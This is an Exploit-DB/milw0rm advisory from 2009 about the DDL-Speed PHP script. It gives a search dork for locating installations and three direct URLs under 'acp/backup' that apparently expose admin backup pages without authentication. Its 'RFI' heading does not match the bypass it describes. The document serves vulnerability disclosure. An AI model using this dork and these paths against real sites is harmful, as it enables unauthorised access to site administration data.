DDL-Speed Script - 'acp/backup' Admin Backup Bypass

EDB-ID:

7629

CVE:

N/A

Author:

tmh

Type:

webapps

Platform:

PHP

Published:

2009-01-01

########################################################################################################################
#DDL-Speed Script RFI Vulnerabilities											
#=======================================================================================================================
#                                                                     							
#Critical Level : Dangerous                                           							
#                                                                     							
#Vendor site : http://ddl-speed.org/  ( Will be back soon)  								
#															
#Download : http://scriptmafia.org/cms/1766-ddl-speed.org-script-vom-30.03.2008.html					
#															
#=======================================================================================================================
#															
#DORK : "index.php?section=post_upload"                                       						
#                                                       								
#															
#															
#Exploit :														
#--------------------------------											
#															
#www.[URL]/[PATH]/acp/backup/log.php	
#www.[URL]/[PATH]/acp/backup/index.php
#www.[URL]/[PATH]/acp/backup/acp.php										
#															
#=======================================================================================================================
#Discovered by : #sys-flaw ( Quakenet)											
#															
#Contact : tmh[at]sys-flaw.com	/ admin[at]sys-flaw.com									
#															
#Greetz to :n00bor , Five-Three-Nine , J0hn.X3r , electron1x , PurpleD1amond , Sebo , Z1uX , meckl , Floo , -Patrick_B ,
#abcdef ,Loader007 , bizzit , Barbers , dev0815 , f0Gx , h0yt3r , Nemo , e-shock , Sys-Flaw , Codesoft ,Free-Hack 	
#	      														
#															
########################################################################################################################

# milw0rm.com [2009-01-01]